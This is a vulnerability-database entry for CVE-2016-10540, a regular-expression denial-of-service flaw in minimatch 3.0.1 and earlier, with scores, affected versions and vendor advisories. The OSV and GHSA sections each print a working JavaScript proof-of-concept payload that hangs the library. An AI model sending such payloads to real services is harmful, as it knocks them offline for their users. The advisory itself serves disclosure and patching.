CVE-2016-10540
Published: 2018-05-31
Priority: P3 (37) · high · 7.5 CVSS 3.0
CVSS 3.0 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS: 1.74% (74.9th percentile)
Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript `RegExp` objects. The primary function, `minimatch(path, pattern)` in Minimatch 3.0.1 and earlier is vulnerable to ReDoS in the `pattern` parameter.
Affected (4 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | node-minimatch | < node-minimatch 3.0.3-1 (bookworm) | node-minimatch 3.0.3-1 (bookworm) |
| hackerone | minimatch_node_module | — | — |
| minimatch_project | minimatch | <= 3.0.1 | — |
| minimatch_project | minimatch | >= 0 < 3.0.2 | 3.0.2 |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 7.5 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:N/I:N/A:P |
| osv | — | 7.5 | HIGH | — |
| vendor_debian | — | 7.5 | LOW | — |
OSV
Regular Expression Denial of Service in minimatch [HIGH]
osv · 2018-10-09
Affected versions of `minimatch` are vulnerable to regular expression denial of service attacks when user input is passed into the `pattern` argument of `minimatch(path, pattern)`.
## Proof of Concept
```js
var minimatch = require("minimatch");
// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};
// pattern that makes the generated RegExp backtrack catastrophically
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
```
## Recommendation
Update to version 3.0.2 or later.
GHSA
Regular Expression Denial of Service in minimatch [HIGH] CWE-400
ghsa · 2018-10-09
Affected versions of `minimatch` are vulnerable to regular expression denial of service attacks when user input is passed into the `pattern` argument of `minimatch(path, pattern)`.
## Proof of Concept
```js
var minimatch = require("minimatch");
// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};
// pattern that makes the generated RegExp backtrack catastrophically
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
```
## Recommendation
Update to version 3.0.2 or later.
OSV
CVE-2016-10540: Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript `RegExp` objects [HIGH]
osv · 2018-05-31 · CVSS 7.5
Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript `RegExp` objects. The primary function, `minimatch(path, pattern)` in Minimatch 3.0.1 and earlier is vulnerable to ReDoS in the `pattern` parameter.
Ubuntu
minimatch vulnerability
vendor_ubuntu · 2021-03-15
Summary: minimatch could be made to crash if it received specially crafted input.
It was discovered that minimatch did not perform necessary bounds checking on regular expressions. An attacker could use this vulnerability to cause a denial of service.
Instructions: In general, a standard system update will make all the necessary changes.
Debian
CVE-2016-10540: node-minimatch - Minimatch is a minimal matching utility that works by converting glob expression... [HIGH]
vendor_debian · 2016 · CVSS 7.5
Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript `RegExp` objects. The primary function, `minimatch(path, pattern)` in Minimatch 3.0.1 and earlier is vulnerable to ReDoS in the `pattern` parameter.
Scope: local
bookworm: resolved (fixed in 3.0.3-1)
bullseye: resolved (fixed in 3.0.3-1)
forky: resolved (fixed in 3.0.3-1)
sid: resolved (fixed in 3.0.3-1)
trixie: resolved (fixed in 3.0.3-1)
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
Published: 2018-05-31